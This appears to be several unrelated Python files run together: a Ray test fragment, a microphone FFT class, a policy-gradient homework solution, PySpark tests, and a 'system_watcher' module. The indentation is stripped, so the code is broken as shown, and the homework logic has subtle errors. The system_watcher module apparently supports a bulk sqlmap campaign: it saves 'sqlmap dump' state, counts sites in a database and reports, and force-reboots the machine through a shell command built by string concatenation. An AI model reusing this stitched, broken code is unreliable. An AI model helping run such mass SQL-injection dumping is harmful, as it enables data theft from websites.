# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
# Clean up
shutil.rmtree(tempdir)
|
SWHear.py
|
"""
this is a stripped down version of the SWHear class.
It's designed to hold only a single audio sample in memory.
check my github for a more complete version:
http://github.com/swharden
"""
import pyaudio
import time
import numpy as np
import threading
def getFFT(data, cps):
"""Given some data and cycles per second, returns FFTfreq and FFT"""
data = data * np.hamming(len(data))
fft = np.abs(np.fft.fft(data))
# fft=10*np.log10(fft)
freq = np.fft.fftfreq(len(fft), 1.0 / cps)  # second argument is the sample spacing in seconds
return freq, fft
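# Hedged usage sketch (not part of the original module): feed getFFT a
# synthetic 1 kHz sine sampled at 44.1 kHz and locate the spectral peak.
# The numbers below are made up for illustration and assume the 1/rate
# sample spacing used in getFFT above.
def _getFFT_demo():
    rate = 44100
    t = np.arange(rate) / float(rate)      # one second of samples
    tone = np.sin(2 * np.pi * 1000.0 * t)  # 1 kHz test tone
    freq, fft = getFFT(tone, rate)
    peak_hz = abs(freq[np.argmax(fft)])    # expected to be close to 1000 Hz
    return peak_hz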
class SWHear():
"""
The SWHear class provides access to continuously recorded
(and mathematically processed) microphone data.
Arguments:
device - the number of the sound card input to use. Leave blank
to automatically detect one.
rate - sample rate to use. Defaults to something supported.
updatesPerSecond - how often to record new data. Note that smaller
numbers mean larger chunks of audio per update and therefore
finer frequency resolution if an FFT is applied later.
"""
def __init__(self, device=None, rate=None, updatesPerSecond=10):
self.p = pyaudio.PyAudio()
self.chunk = 4096 # gets replaced automatically
self.updatesPerSecond = updatesPerSecond
self.chunksRead = 0
self.device = device
self.rate = rate
### SYSTEM TESTS
def valid_low_rate(self, device):
"""set the rate to the lowest supported audio rate."""
for testrate in [44100]:
if self.valid_test(device, testrate):
return testrate
print("SOMETHING'S WRONG! I can't figure out how to use DEV", device)
return None
def valid_test(self, device, rate=44100):
"""given a device ID and a rate, return TRUE/False if it's valid."""
try:
self.info = self.p.get_device_info_by_index(device)
if not self.info["maxInputChannels"] > 0:
return False
stream = self.p.open(format=pyaudio.paInt16, channels=1,
input_device_index=device, frames_per_buffer=self.chunk,
rate=int(self.info["defaultSampleRate"]), input=True)
stream.close()
return True
except Exception:
return False
def valid_input_devices(self):
"""
See which devices can be opened for microphone input.
call this when no PyAudio object is loaded.
"""
mics = []
for device in range(self.p.get_device_count()):
if self.valid_test(device):
mics.append(device)
if len(mics) == 0:
print("no microphone devices found!")
else:
print("found %d microphone devices: %s" % (len(mics), mics))
return mics
### SETUP AND SHUTDOWN
def initiate(self):
"""run this after changing settings (like rate) before recording"""
if self.device is None:
self.device = self.valid_input_devices()[0] # pick the first one
if self.rate is None:
self.rate = self.valid_low_rate(self.device)
self.chunk = int(self.rate / self.updatesPerSecond)  # hold 1/updatesPerSecond seconds of audio in memory
if not self.valid_test(self.device, self.rate):
print("guessing a valid microphone device/rate...")
self.device = self.valid_input_devices()[0] # pick the first one
self.rate = self.valid_low_rate(self.device)
self.datax = np.arange(self.chunk) / float(self.rate)
msg = 'recording from "%s" ' % self.info["name"]
msg += '(device %d) ' % self.device
msg += 'at %d Hz' % self.rate
print(msg)
def close(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording = False # the threads should self-close
while self.t.is_alive():  # wait for the reader thread to close
time.sleep(.1)
self.stream.stop_stream()
self.p.terminate()
### STREAM HANDLING
def stream_readchunk(self):
"""reads some audio and re-launches itself"""
try:
self.data = np.frombuffer(self.stream.read(self.chunk), dtype=np.int16)
self.fftx, self.fft = getFFT(self.data, self.rate)
except Exception as E:
print(" -- exception! terminating...")
print(E, "\n" * 5)
self.keepRecording = False
if self.keepRecording:
self.stream_thread_new()
else:
self.stream.close()
self.p.terminate()
print(" -- stream STOPPED")
self.chunksRead += 1
def stream_thread_new(self):
self.t = threading.Thread(target=self.stream_readchunk)
self.t.start()
def stream_start(self):
"""adds data to self.data until termination signal"""
self.initiate()
print(" -- starting stream")
self.keepRecording = True # set this to False later to terminate stream
self.data = None # will fill up with threaded recording data
self.fft = None
self.dataFiltered = None # same
self.stream = self.p.open(format=pyaudio.paInt16, channels=1,
rate=self.rate, input=True, frames_per_buffer=self.chunk)
self.stream_thread_new()
if __name__ == "__main__":
ear = SWHear(updatesPerSecond=10)  # optionally set device, rate, or updatesPerSecond here
ear.stream_start() # goes forever
lastRead = ear.chunksRead
while True:
while lastRead == ear.chunksRead:
time.sleep(.01)
print(ear.chunksRead, len(ear.data))
lastRead = ear.chunksRead
print("DONE")
|
system_watcher.py
|
import logger
log = logger.logger_class()
import threading, os, time, subprocess
class system_health_watcher():
# SAVE SETTINGS
def save_sqlmap_settings(self):
try:
log.warning("system_health_watcher|save_sqlmap_settings", "Save sqlmap dump state.")
result = subprocess.Popen(['screen', '-ls'], stdout=subprocess.PIPE)
for processes in result.stdout.readlines():
if "sqlmap" in processes:
sqlmap_dump = processes.split(".")[2] + "." + processes.split(".")[3] + "." + \
processes.split(".")[4].split(" ")[0]
subprocess.call("sed -i.bak '/" + sqlmap_dump + "/d' ./sqlmap_done.txt", shell=True)
except Exception as error_code:
log.warning("system_health_watcher|save_sqlmap_settings", str(error_code))
pass
# CHECK MEMORY USAGE
def check_memory_usage(self):
try:
while True:
try:
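# Note (added for clarity; based on typical `free -t -m` output): the last
# line of `free -t` looks like "Total: <total> <used> <free>", so the slice
# below takes those three megabyte columns. The exact layout can vary by
# distribution and procps version.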
tot_m, used_m, free_m = map(int, os.popen('free -t -m').readlines()[-1].split()[1:])
log.info("system_health_watcher|check_memory_usage",
"Total memory: " + str(tot_m) + " | Used memory: "
+ str(used_m) + " | Free memory: " + str(free_m))
if free_m < 200:
log.warning("system_health_watcher|check_memory_usage", "Not enough memory in the system, "
"force reboot.")
self.save_sqlmap_settings()
os.system("reboot -f")
time.sleep(5)
except Exception as error_code:
log.warning("system_health_watcher|check_memory_usage", str(error_code))
pass
except Exception as error_code:
log.warning("system_health_watcher|check_memory_usage", str(error_code))
pass
# UPDATE STATS FILE
def update_stats(self, indb, done):
try:
stats = open("stats.txt", "w+")
stats.write("SITES_IN_DB = " + indb + "\n")
stats.write("SITES_LEFT = " + done + "\n")
stats.write("REPORTS_COUNT = " + str(len(os.listdir("reports"))) + "\n")
stats.write("REPORTS_REQUESTS = " + str(len(os.listdir("reports_requests"))) + "\n")
stats.close()
except Exception as error_code:
log.warning("system_health_watcher|update_stats", str(error_code))
pass
def __init__(self):
try:
log.info("system_health_watcher|__init__", "Started.")
check_memory_usage_thread = threading.Thread(target=self.check_memory_usage)
check_memory_usage_thread.start()
except Exception as error_code:
log.warning("system_health_watcher|__init__", str(error_code))
pass
|
train_pg_f18_pt.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import torch.nn as nn
import torch
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
from utils import normalize, init_weights
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
class MLP(nn.Module):
def __init__(self, input_size, output_size, n_layers, hidden_size, is_discrete):
super(MLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.is_discrete = is_discrete
self.logstd = nn.Parameter(torch.randn((self.output_size,)))
self.fc_input = nn.Linear(self.input_size, self.hidden_size)
self.middle_layers = []
for _ in range(n_layers - 1):
self.middle_layers.append(
nn.Linear(self.hidden_size, self.hidden_size))
self.m_layers = nn.ModuleList(self.middle_layers)
self.out_layer = nn.Linear(self.hidden_size, self.output_size)
self.sm = nn.Softmax(dim=-1)
def forward(self, x):
x = torch.tanh(self.fc_input(x))
for layer in self.m_layers:
x = torch.tanh(layer(x))
x = self.out_layer(x)
if self.is_discrete:
x = self.sm(x)
return x
else:
return x, self.logstd
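# Hedged usage sketch (not part of the original training code): build a small
# discrete-action policy MLP and run a forward pass on a dummy observation
# batch. The ob_dim/ac_dim values here are made up for illustration.
def _mlp_smoke_test():
    policy = MLP(input_size=4, output_size=2, n_layers=2,
                 hidden_size=32, is_discrete=True)
    dummy_obs = torch.zeros(8, 4)      # batch of 8 fake observations
    probs = policy(dummy_obs)          # (8, 2) action probabilities (softmax output)
    assert probs.shape == (8, 2)
    return probs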
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getfullargspec(train_PG).args
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
# Model def.
self.model = MLP(self.ob_dim, self.ac_dim,
self.n_layers, self.size, self.discrete)
self.model.apply(init_weights)
self.lr = self.learning_rate  # use the learning rate passed in via computation_graph_args
self.beta1 = 0.9
self.beta2 = 0.999
if self.nn_baseline:
self.baseline_model = MLP(
self.ob_dim, 1, self.n_layers, self.size, False)  # regression head: raw value output, not softmax probabilities
self.baseline_model.apply(init_weights)
# FIX this
self.base_opt = torch.optim.Adam(self.baseline_model.parameters(
), lr=self.lr, betas=(self.beta1, self.beta2))
self.opt = torch.optim.Adam(self.model.parameters(
), lr=self.lr, betas=(self.beta1, self.beta2))
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = self.model(sy_ob_no)
return sy_logits_na
else:
sy_mean, sy_logstd = self.model(sy_ob_no)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use torch.randn / torch.randn_like!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = torch.multinomial(
sy_logits_na, num_samples=1).view(-1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = torch.normal(mean=sy_mean, std=sy_logstd.exp())
sy_sampled_ac = sy_sampled_ac.sum(-1)
return sy_sampled_ac
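# Hedged illustration (not part of the original assignment) of the
# reparameterization trick mentioned in the docstring above: a sample from
# N(mu, sigma^2) can be drawn as mu + sigma * z with z ~ N(0, I), which is
# equivalent in distribution to the torch.normal call used in sample_action.
def _sample_action_reparam(sy_mean, sy_logstd):
    z = torch.randn_like(sy_mean)          # z ~ N(0, I), same shape as the mean
    return sy_mean + sy_logstd.exp() * z   # exp() turns the log std into a std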
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
dist = torch.distributions.categorical.Categorical(
probs=sy_logits_na)  # the MLP's forward pass already applies a softmax, so these are probabilities
sy_logprob_n = dist.log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
# sy_logstd is a log standard deviation, so exponentiate it to get the scale.
dist = torch.distributions.Normal(loc=sy_mean, scale=sy_logstd.exp())
sy_logprob_n = dist.log_prob(sy_ac_na)
return sy_logprob_n
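# Hedged sanity check (not in the original assignment): for a categorical
# distribution, Categorical(logits=l).log_prob(a) equals indexing into
# log_softmax(l) at a. Helper added purely for illustration.
def _check_categorical_log_prob(logits, actions):
    dist = torch.distributions.Categorical(logits=logits)
    manual = nn.functional.log_softmax(logits, dim=-1).gather(
        -1, actions.long().unsqueeze(-1)).squeeze(-1)
    return torch.allclose(dist.log_prob(actions.long()), manual)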
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode = (len(paths) == 0 and (
itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ob_pt = torch.from_numpy(ob).float()
policy_parameters = self.model(ob_pt)
ac = self.sample_action(policy_parameters)
ac = ac.numpy()
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation": np.array(obs, dtype=np.float32),
"reward": np.array(rewards, dtype=np.float32),
"action": np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
q_n = []
if self.reward_to_go:
ret_tau = 0
for re in re_n:
for i in range(len(re)):
Q_re = 0
for j in range(i, len(re)):
discount = self.gamma ** (j - i)  # Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
ret_tau = discount * re[j]
Q_re += ret_tau
q_n.append(Q_re)
else:
ret_tau = 0
for re in re_n:
Q_re = 0
for i in range(len(re)):
discount = self.gamma ** i
ret_tau = discount * re[i]
Q_re += ret_tau
q_n.extend([Q_re] * len(re))
return np.asarray(q_n)
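# Hedged alternative sketch (not part of the original assignment): the
# reward-to-go values Q_t = sum_{t'=t}^T gamma^(t'-t) r_{t'} for a single
# path can be computed in one reverse pass instead of the nested loops above.
# gamma here is assumed to play the same role as self.gamma.
def _reward_to_go(rewards, gamma):
    q = np.zeros(len(rewards))
    running = 0.0
    for t in reversed(range(len(rewards))):
        running = rewards[t] + gamma * running   # Q_t = r_t + gamma * Q_{t+1}
        q[t] = running
    return q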
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
ob_no_pt = torch.from_numpy(ob_no).type(torch.FloatTensor)
b_n, _ = self.baseline_model(ob_no_pt)  # the continuous-style MLP returns (value, logstd); the logstd is unused here
b_n = b_n.view(-1).detach().numpy()
b_n = normalize(b_n, mu=np.mean(q_n), std=np.std(q_n))
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = normalize(adv_n)
return q_n, adv_n
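# Hedged sketch (not the real utils.normalize) of what the imported
# `normalize` helper is assumed to do, inferred from how it is called in
# compute_advantage and estimate_return: standardize to zero mean / unit
# std by default, optionally rescaled to a target mu and std.
def _normalize_sketch(x, mu=0.0, std=1.0, eps=1e-8):
    x = np.asarray(x, dtype=np.float64)
    return (x - x.mean()) / (x.std() + eps) * std + mu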
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
# 1) numpy -> tensor
# 2) obs to model, get policy parameters
# a model.forward, sample actions, get logprobs
# 3) get the loss, logprobs * advantages
# 4) zero_grad, loss.back(), opt.step
ob_no_pt = torch.from_numpy(ob_no).type(torch.FloatTensor)
ac_na_pt = torch.from_numpy(ac_na).type(torch.FloatTensor)
q_n_pt = torch.from_numpy(q_n).type(torch.FloatTensor)
adv_n_pt = torch.from_numpy(adv_n).type(torch.FloatTensor)
# # Policy forward
policy_parameters = self.policy_forward_pass(ob_no_pt)
# Get the log prob
log_prob = self.get_log_prob(policy_parameters, ac_na_pt)
model_loss = - (log_prob * adv_n_pt).mean()
self.opt.zero_grad()
model_loss.backward()
self.opt.step()
#====================================================================================#
# ----------PROBLEM 6----------
# TODO
#
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
            # Fit it to the current batch so it can be used at the next iteration
            # (the baseline optimizer step below performs this update).
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
            # Fit the baseline to predict the (normalized) Q-values:
            # 1) run the observations through the baseline network,
            # 2) rescale the Q-value targets to mean zero and std one,
            # 3) compute the MSE loss and take an optimizer step on the baseline.
q_n_baseline_output = self.baseline_model(ob_no_pt).view(-1)
q_n_pt_normalized = (q_n_pt - q_n_pt.mean()) / (q_n_pt.std() + 1e-7)
loss_fn = torch.nn.MSELoss()
self.baseline_loss = loss_fn(q_n_baseline_output, q_n_pt_normalized)
self.base_opt.zero_grad()
self.baseline_loss.backward()
self.base_opt.step()
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
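        # A minimal sketch of that debug logging (assumption: recomputing the loss with
        # the updated policy is acceptable here, at the cost of one extra forward pass).
        with torch.no_grad():
            updated_log_prob = self.get_log_prob(self.policy_forward_pass(ob_no_pt), ac_na_pt)
            updated_loss = -(updated_log_prob * adv_n_pt).mean()
        print("policy loss before update: %.4f, after update: %.4f"
              % (model_loss.item(), updated_loss.item()))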
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
    # Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args,
sample_trajectory_args, estimate_return_args)
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************" % itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
        # PyTorch gradient update: policy gradient step (and baseline fit, if enabled)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages',
'-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + \
'_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10 * e
print('Running experiment with seed %d' % seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir, '%d' % seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
        # Awkward hacky process runs, because Tensorflow does not like
        # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
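# Example invocation (hypothetical script name and environment; the flags map to the
# argparse options defined in main() above):
#   python train_pg.py CartPole-v0 -n 100 -b 1000 -lr 5e-3 -rtg --exp_name cartpole_rtg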
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark.sql import SQLContext, IntegerType, Row
from pyspark import shuffle
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 14
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
